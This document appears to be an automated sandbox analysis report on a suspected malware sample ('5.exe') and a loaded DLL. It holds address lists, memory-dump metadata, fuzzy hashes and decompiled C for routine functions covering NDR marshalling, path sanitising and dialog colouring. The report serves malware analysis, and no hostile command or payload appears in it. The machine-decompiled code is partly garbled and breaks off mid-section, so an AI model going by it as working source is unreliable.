                                                                                              0x6f1d9a18
                                                                                              0x6f1d9a19
                                                                                              0x6f1d9a1e
                                                                                              0x6f1d9a23
                                                                                              0x6f1d9a26
                                                                                              0x6f1d9a2c
                                                                                              0x6f1d9a2e
                                                                                              0x6f1d9a34
                                                                                              0x6f1d9a38
                                                                                              0x6f1d9a3d
                                                                                              0x6f1d9a40
                                                                                              0x6f1d9a43
                                                                                              0x6f1d9a46
                                                                                              0x6f1d9a49
                                                                                              0x6f1d9a50
                                                                                              0x6f1d9a57
                                                                                              0x6f1d9a8a
                                                                                              0x6f1d9a8d
                                                                                              0x6f1d9a90
                                                                                              0x6f1d9a91
                                                                                              0x6f1d9a96
                                                                                              0x6f1d9a9b
                                                                                              0x6f1d9a59
                                                                                              0x6f1d9a59
                                                                                              0x6f1d9a5c
                                                                                              0x6f1d9a62
                                                                                              0x6f1d9a77
                                                                                              0x6f1d9a79
                                                                                              0x6f1d9a7c
                                                                                              0x6f1d9a7d
                                                                                              0x6f1d9a80
                                                                                              0x6f1d9a81
                                                                                              0x6f1d9a84
                                                                                              0x6f1d9a85
                                                                                              0x6f1d9a64
                                                                                              0x6f1d9a64
                                                                                              0x6f1d9a66
                                                                                              0x6f1d9a69
                                                                                              0x6f1d9a6a
                                                                                              0x6f1d9a6d
                                                                                              0x6f1d9a6e
                                                                                              0x6f1d9a71
                                                                                              0x6f1d9a72
                                                                                              0x6f1d9a72
                                                                                              0x6f1d9a88
                                                                                              0x6f1d9a9e
                                                                                              0x6f1d9aa1
                                                                                              0x6f1d9aa4
                                                                                              0x6f1d9aaa
                                                                                              0x6f1d9aad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9ab5
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d96a8
                                                                                              0x6f1d96aa
                                                                                              0x6f1d96b2
                                                                                              0x6f1d96ba
                                                                                              0x6f1d96bd
                                                                                              0x6f1d96c0
                                                                                              0x6f1d96c2
                                                                                              0x6f1d96c5
                                                                                              0x6f1d96c6
                                                                                              0x6f1d96c9
                                                                                              0x6f1d96cb
                                                                                              0x6f1d96cc
                                                                                              0x6f1d96d1
                                                                                              0x6f1d96d6
                                                                                              0x6f1d96dc
                                                                                              0x6f1d96df
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d96e7
                                                                                              0x6f1d96e9
                                                                                              0x6f1d96ed
                                                                                              0x6f1d96f9
                                                                                              0x6f1d96fc
                                                                                              0x6f1d96ff
                                                                                              0x6f1d9701
                                                                                              0x6f1d9704
                                                                                              0x6f1d9705
                                                                                              0x6f1d9708
                                                                                              0x6f1d970a
                                                                                              0x6f1d970b
                                                                                              0x6f1d9710
                                                                                              0x6f1d9715
                                                                                              0x6f1d971b
                                                                                              0x6f1d971e
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d95a4
                                                                                              0x6f1d9adf
                                                                                              0x6f1d9adf
                                                                                              0x6f1d9acb

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                              • API String ID: 2102423945-1168472477
                                                                                              • Opcode ID: b374cf573ca7c8aada9babcb2ebfcdd45b4dc71a7a78e6d56898129529a50668
                                                                                              • Instruction ID: 1906c049e510a06eb3321f8453d286d876534ff0f1bdd2ca351cac78b003d296
                                                                                              • Opcode Fuzzy Hash: b374cf573ca7c8aada9babcb2ebfcdd45b4dc71a7a78e6d56898129529a50668
                                                                                              • Instruction Fuzzy Hash: 77C11CB5A00209AFCB08CF58D9A0EAE77B5EF89354F44C159F9194F349D731EA60CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D3840, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 212COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 37%
                                                                                              			E6F1D3840(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				signed char* _v8;
				signed char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr* _t124;
				void* _t126;
				intOrPtr _t129;
				void* _t134;
				void* _t198;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t204;

				_v8 = _a12;
				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t201 = _t200 + 0x14;
				_a12 = _a12 + 6;
				if(( *_v8 & 0x000000ff) == 0x19) {
					_v12 =  &(_v8[_v8[4] + 4]);
					_v28 = E6F1DD650( *_v12 & 0x000000ff, _a4, _v12);
					E6F1D73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					0x6f1d0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					_t204 = _t201 + 0x1c;
					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
						_a16 = 1;
					}
					if((_a16 & 0x000000ff) != 0) {
						_v32 = (_v8[2] & 0x0000ffff) + _v28;
						_t129 = E6F1DA3B0(_v32, _a4, _v32);
						_t204 = _t204 + 8;
						 *_a8 = _t129;
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					_v16 =  *((intOrPtr*)(_a4 + 0x10));
					E6F1DAF00(_a4, _v8[2] & 0x0000ffff);
					_v36 = (_v8[2] & 0x0000ffff) +  *_a8;
					_v20 = E6F1DD830(_t134, _t198, _t199,  *_v12 & 0x000000ff, _a4,  &_v36, _v12, 0, 0, 0);
					_v40 =  *((intOrPtr*)(_a4 + 0x40));
					_v24 =  *((intOrPtr*)(_a4 + 4));
					E6F1DAF00(_a4, _v20);
					E6F1DC2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
					E6F1E00E0( *_a8, _v16, _v8[2] & 0x0000ffff);
					0x6f1d0000("copying %p to %p\n", _v24, (_v8[2] & 0x0000ffff) +  *_a8);
					E6F1E00E0( *_a8 + (_v8[2] & 0x0000ffff) + _v40, _v24, _v20);
					if(( *_v12 & 0x000000ff) != 0x22) {
						if(( *_v12 & 0x000000ff) == 0x25) {
							_t124 = _a8;
							0x6f1d0000((_v8[2] & 0x0000ffff) +  *_t124);
							0x6f1d0000("string=%s\n", _t124);
						}
					} else {
						_t126 = (_v8[2] & 0x0000ffff) +  *_a8;
						0x6f1d0000(_t126);
						0x6f1d0000("string=%s\n", _t126);
					}
					return 0;
				}
				0x6f1d0000("invalid format type %x\n",  *_v8 & 0x000000ff);
				 *0x6f1d0000(0x6e6);
				return 0;
			}





















                                                                                              0x6f1d3849
                                                                                              0x6f1d3862
                                                                                              0x6f1d3867
                                                                                              0x6f1d3870
                                                                                              0x6f1d387c
                                                                                              0x6f1d38b2
                                                                                              0x6f1d38cc
                                                                                              0x6f1d38e1
                                                                                              0x6f1d38f6
                                                                                              0x6f1d38fb
                                                                                              0x6f1d3904
                                                                                              0x6f1d390e
                                                                                              0x6f1d390e
                                                                                              0x6f1d3918
                                                                                              0x6f1d3924
                                                                                              0x6f1d392f
                                                                                              0x6f1d3934
                                                                                              0x6f1d393a
                                                                                              0x6f1d393a
                                                                                              0x6f1d3945
                                                                                              0x6f1d394e
                                                                                              0x6f1d395d
                                                                                              0x6f1d3971
                                                                                              0x6f1d3995
                                                                                              0x6f1d399e
                                                                                              0x6f1d39a7
                                                                                              0x6f1d39b2
                                                                                              0x6f1d39d1
                                                                                              0x6f1d39eb
                                                                                              0x6f1d3a09
                                                                                              0x6f1d3a2b
                                                                                              0x6f1d3a3c
                                                                                              0x6f1d3a6c
                                                                                              0x6f1d3a75
                                                                                              0x6f1d3a7b
                                                                                              0x6f1d3a89
                                                                                              0x6f1d3a8e
                                                                                              0x6f1d3a3e
                                                                                              0x6f1d3a48
                                                                                              0x6f1d3a4b
                                                                                              0x6f1d3a59
                                                                                              0x6f1d3a5e
                                                                                              0x00000000
                                                                                              0x6f1d3a91
                                                                                              0x6f1d388a
                                                                                              0x6f1d3897
                                                                                              0x00000000

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x$memory_size = %d$string=%s$string=%s
                                                                                              • API String ID: 0-4074488482
                                                                                              • Opcode ID: 36cf44a2a641a78deb6f03fc308b9c1345786865dfbf2bfe468795c97b6ba953
                                                                                              • Instruction ID: a3ae1d431a037ff93f394ae6484eed4616c7db4af07049cf03b9787e8609c3ab
                                                                                              • Opcode Fuzzy Hash: 36cf44a2a641a78deb6f03fc308b9c1345786865dfbf2bfe468795c97b6ba953
                                                                                              • Instruction Fuzzy Hash: 178161B5A00214AFCB04CF98D891EAEB7F5AF88345F14C198F8499B345D735EE61DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D3600, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 193COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 29%
                                                                                              			E6F1D3600(intOrPtr _a4, signed int* _a8, signed char* _a12, signed int _a16) {
				signed char* _v8;
				intOrPtr _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _t94;
				intOrPtr _t98;
				signed int _t115;
				signed char* _t135;
				signed char* _t163;
				void* _t181;
				void* _t182;
				void* _t186;
				void* _t187;

				_v8 = _a12;
				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t182 = _t181 + 0x14;
				_a12 = _a12 + 6;
				if(( *_v8 & 0x000000ff) != 0x18 && ( *_v8 & 0x000000ff) != 0x17) {
					0x6f1d0000("invalid format type %x\n",  *_v8 & 0x000000ff);
					 *0x6f1d0000(0x6e6);
					return 0;
				}
				_v16 =  &(_v8[_v8[4] + 4]);
				__eflags = ( *_v16 & 0x000000ff) - 0x1b;
				if(__eflags == 0) {
					_v24 = _v16[2] & 0x0000ffff;
					_v16 = E6F1DA460( &(_v16[4]), __eflags, _a4,  &(_v16[4]));
					E6F1D73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					0x6f1d0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					_t94 = E6F1DAEC0(_v24,  *((intOrPtr*)(_a4 + 0x3c)));
					_t186 = _t182 + 0x20;
					_v12 = _t94;
					_t163 = _v8;
					_t135 = _v8;
					__eflags = ( *(_t163 + 2) & 0x0000ffff) + _v12 - ( *(_t135 + 2) & 0x0000ffff);
					if(( *(_t163 + 2) & 0x0000ffff) + _v12 < ( *(_t135 + 2) & 0x0000ffff)) {
						0x6f1d0000("integer overflow of memory_size %u with bufsize %u\n", _v8[2] & 0x0000ffff, _v12);
						_t186 = _t186 + 0xc;
						 *0x6f1d0000(0x6f7);
					}
					__eflags = _a16 & 0x000000ff;
					if((_a16 & 0x000000ff) == 0) {
						_t98 = _a4;
						__eflags =  *(_t98 + 0x20) & 0x000000ff;
						if(( *(_t98 + 0x20) & 0x000000ff) == 0) {
							__eflags =  *_a8;
							if( *_a8 == 0) {
								 *_a8 =  *(_a4 + 4);
							}
						}
					} else {
						_v28 = (_v8[2] & 0x0000ffff) + _v12;
						_t115 = E6F1DA3B0(_a4, _a4, _v28);
						_t186 = _t186 + 8;
						 *_a8 = _t115;
					}
					 *(_a4 + 0x10) =  *(_a4 + 4);
					_v20 =  *(_a4 + 0x10);
					E6F1DAF00(_a4, (_v8[2] & 0x0000ffff) + _v12);
					_t187 = _t186 + 8;
					__eflags = ( *_v8 & 0x000000ff) - 0x18;
					if(( *_v8 & 0x000000ff) == 0x18) {
						E6F1DC2B0(_a4, _v20,  *_a8, _a12, _a16 & 0x000000ff);
						_t187 = _t187 + 0x14;
					}
					0x6f1d0000("copying %p to %p\n", _v20,  *_a8);
					__eflags =  *_a8 - _v20;
					if( *_a8 != _v20) {
						__eflags = (_v8[2] & 0x0000ffff) + _v12;
						E6F1E00E0( *_a8, _v20, (_v8[2] & 0x0000ffff) + _v12);
					}
					__eflags = 0;
					return 0;
				} else {
					0x6f1d0000("invalid array format type %x\n",  *_v8 & 0x000000ff);
					 *0x6f1d0000(0x6e6);
					return 0;
				}
			}


















                                                                                              0x6f1d3609
                                                                                              0x6f1d3622
                                                                                              0x6f1d3627
                                                                                              0x6f1d3630
                                                                                              0x6f1d363c
                                                                                              0x6f1d3655
                                                                                              0x6f1d3662
                                                                                              0x00000000
                                                                                              0x6f1d3668
                                                                                              0x6f1d367d
                                                                                              0x6f1d3686
                                                                                              0x6f1d3689
                                                                                              0x6f1d36b8
                                                                                              0x6f1d36ce
                                                                                              0x6f1d36e3
                                                                                              0x6f1d36f8
                                                                                              0x6f1d370b
                                                                                              0x6f1d3710
                                                                                              0x6f1d3713
                                                                                              0x6f1d3716
                                                                                              0x6f1d3720
                                                                                              0x6f1d3727
                                                                                              0x6f1d3729
                                                                                              0x6f1d373c
                                                                                              0x6f1d3741
                                                                                              0x6f1d3749
                                                                                              0x6f1d3749
                                                                                              0x6f1d3753
                                                                                              0x6f1d3755
                                                                                              0x6f1d377b
                                                                                              0x6f1d3782
                                                                                              0x6f1d3784
                                                                                              0x6f1d3789
                                                                                              0x6f1d378c
                                                                                              0x6f1d3797
                                                                                              0x6f1d3797
                                                                                              0x6f1d378c
                                                                                              0x6f1d3757
                                                                                              0x6f1d3761
                                                                                              0x6f1d376c
                                                                                              0x6f1d3771
                                                                                              0x6f1d3777
                                                                                              0x6f1d3777
                                                                                              0x6f1d37a2
                                                                                              0x6f1d37ab
                                                                                              0x6f1d37bd
                                                                                              0x6f1d37c2
                                                                                              0x6f1d37cb
                                                                                              0x6f1d37ce
                                                                                              0x6f1d37e7
                                                                                              0x6f1d37ec
                                                                                              0x6f1d37ec
                                                                                              0x6f1d37fe
                                                                                              0x6f1d380b
                                                                                              0x6f1d380e
                                                                                              0x6f1d3817
                                                                                              0x6f1d3825
                                                                                              0x6f1d382a
                                                                                              0x6f1d382d
                                                                                              0x00000000
                                                                                              0x6f1d368b
                                                                                              0x6f1d3697
                                                                                              0x6f1d36a4
                                                                                              0x00000000
                                                                                              0x6f1d36aa

                                                                                              Strings
                                                                                              • invalid format type %x, xrefs: 6F1D3650
                                                                                              • invalid array format type %x, xrefs: 6F1D3692
                                                                                              • copying %p to %p, xrefs: 6F1D37F9
                                                                                              • integer overflow of memory_size %u with bufsize %u, xrefs: 6F1D3737
                                                                                              • (%p, %p, %p, %d), xrefs: 6F1D361D
                                                                                              • memory_size = %d, xrefs: 6F1D36F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$integer overflow of memory_size %u with bufsize %u$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                              • API String ID: 0-1713900660
                                                                                              • Opcode ID: d7c1c2fa15e208aa8e93ae6ffa0f65dc1a1fed11c713e9a7636c66c7fa32daea
                                                                                              • Instruction ID: f14a2d09ca9cdcabd5295c33b3e021e341f1e402f2b82271c2a17a59131a7494
                                                                                              • Opcode Fuzzy Hash: d7c1c2fa15e208aa8e93ae6ffa0f65dc1a1fed11c713e9a7636c66c7fa32daea
                                                                                              • Instruction Fuzzy Hash: 97715EB5A00118AFCB04CF98D8919AEBBF1BF89345F148189F8599B345D731EE61DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D8850, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 16%
                                                                                              			E6F1D8850(intOrPtr* _a4, intOrPtr* _a8, signed char* _a12, signed char _a16) {
				intOrPtr* _v8;
				char* _v12;
				intOrPtr _v16;
				signed char* _t49;
				signed char* _t76;
				void* _t87;
				void* _t88;

				if((_a16 & 0x000000ff) == 0) {
					_v12 = "FALSE";
				} else {
					_v12 = "TRUE";
				}
				0x6f1d0000("pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s\n", _a4, _a8, _a12, _v12);
				_t88 = _t87 + 0x14;
				if(( *_a12 & 0x000000ff) != 0x30) {
					0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					_t88 = _t88 + 8;
					 *0x6f1d0000(0x6e6);
				}
				0x6f1d0000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
					_v16 = E6F1D4BC0(__eflags, _a4, _a12);
					_t76 = _a12;
					__eflags =  *(_t76 + (1 << 0)) & 0x80;
					if(( *(_t76 + (1 << 0)) & 0x80) == 0) {
						 *_a8 =  *((intOrPtr*)(_v16 + 8));
					} else {
						 *_a8 = _v16 + 8;
					}
				} else {
					if((_a12[1] & 0x80) == 0) {
						_v8 = _a8;
					} else {
						_v8 =  *_a8;
					}
					_t49 = _a12;
					_t94 = (_t49[1] & 0x60) - 0x20;
					if((_t49[1] & 0x60) == 0x20) {
						 *_v8 = 0;
					}
					E6F1D49D0(_t94, _a4, _v8,  *((intOrPtr*)( *_a4)));
				}
				return 0;
			}










                                                                                              0x6f1d885c
                                                                                              0x6f1d8867
                                                                                              0x6f1d885e
                                                                                              0x6f1d885e
                                                                                              0x6f1d885e
                                                                                              0x6f1d8883
                                                                                              0x6f1d8888
                                                                                              0x6f1d8894
                                                                                              0x6f1d88a2
                                                                                              0x6f1d88a7
                                                                                              0x6f1d88af
                                                                                              0x6f1d88af
                                                                                              0x6f1d88ca
                                                                                              0x6f1d88db
                                                                                              0x6f1d8948
                                                                                              0x6f1d8953
                                                                                              0x6f1d895a
                                                                                              0x6f1d895f
                                                                                              0x6f1d8977
                                                                                              0x6f1d8961
                                                                                              0x6f1d896a
                                                                                              0x6f1d896a
                                                                                              0x6f1d88dd
                                                                                              0x6f1d88f2
                                                                                              0x6f1d8901
                                                                                              0x6f1d88f4
                                                                                              0x6f1d88f9
                                                                                              0x6f1d88f9
                                                                                              0x6f1d890c
                                                                                              0x6f1d8916
                                                                                              0x6f1d8919
                                                                                              0x6f1d891e
                                                                                              0x6f1d891e
                                                                                              0x6f1d8934
                                                                                              0x6f1d8934
                                                                                              0x6f1d897e

                                                                                              APIs
                                                                                              • _NdrClientContextUnmarshall@12.RGSBZEOG(?,?,00000001), ref: 6F1D8934
                                                                                              • _NdrServerContextNewUnmarshall@8.RGSBZEOG(?,?), ref: 6F1D8943
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Context$ClientServerUnmarshall@12Unmarshall@8
                                                                                              • String ID: FALSE$TRUE$flags: 0x%02x$invalid format type %x$pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s
                                                                                              • API String ID: 4170269409-3585304320
                                                                                              • Opcode ID: 0043b46f6e066f7d35f80d8ad764d31422a48ff45987457a12961ac54e129a06
                                                                                              • Instruction ID: 92a3566e29d9f01f9d6374cf7a030be7121e017577eca03b938f72ae90aa2d6d
                                                                                              • Opcode Fuzzy Hash: 0043b46f6e066f7d35f80d8ad764d31422a48ff45987457a12961ac54e129a06
                                                                                              • Instruction Fuzzy Hash: 774197B5604258AFDB04CF55C860FAE7BB1FF8A395F10C159F8658B384C635E961CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405B89, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405B89(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040548B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                              0x00405b8b
                                                                                              0x00405b93
                                                                                              0x00405ba7
                                                                                              0x00405ba7
                                                                                              0x00405bad
                                                                                              0x00405bba
                                                                                              0x00405bba
                                                                                              0x00405bbb
                                                                                              0x00405bbd
                                                                                              0x00405bc1
                                                                                              0x00405bc3
                                                                                              0x00405bcc
                                                                                              0x00405bce
                                                                                              0x00405be8
                                                                                              0x00405bf0
                                                                                              0x00405bf0
                                                                                              0x00405bf5
                                                                                              0x00405bf7
                                                                                              0x00405bf9
                                                                                              0x00405bfd
                                                                                              0x00405bfe
                                                                                              0x00405c01
                                                                                              0x00405c09
                                                                                              0x00405c0b
                                                                                              0x00405c0f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405c15
                                                                                              0x00405c1a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405c1a
                                                                                              0x00405c1f

                                                                                              APIs
                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                              • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                              • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-1471166050
                                                                                              • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                                                                              • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                                                                                              • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                                                                              • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403D44, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                              0x00403d56
                                                                                              0x00403dea
                                                                                              0x00000000
                                                                                              0x00403dea
                                                                                              0x00403d67
                                                                                              0x00403d6b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403d71
                                                                                              0x00403d7a
                                                                                              0x00403d7d
                                                                                              0x00403d7d
                                                                                              0x00403d83
                                                                                              0x00403d89
                                                                                              0x00403d89
                                                                                              0x00403d95
                                                                                              0x00403d9b
                                                                                              0x00403da2
                                                                                              0x00403da5
                                                                                              0x00403da8
                                                                                              0x00403daa
                                                                                              0x00403daa
                                                                                              0x00403db2
                                                                                              0x00403db8
                                                                                              0x00403db8
                                                                                              0x00403dc2
                                                                                              0x00403dc7
                                                                                              0x00403dca
                                                                                              0x00403dcf
                                                                                              0x00403dd2
                                                                                              0x00403dd2
                                                                                              0x00403de2
                                                                                              0x00403de2
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Memory Dump Source
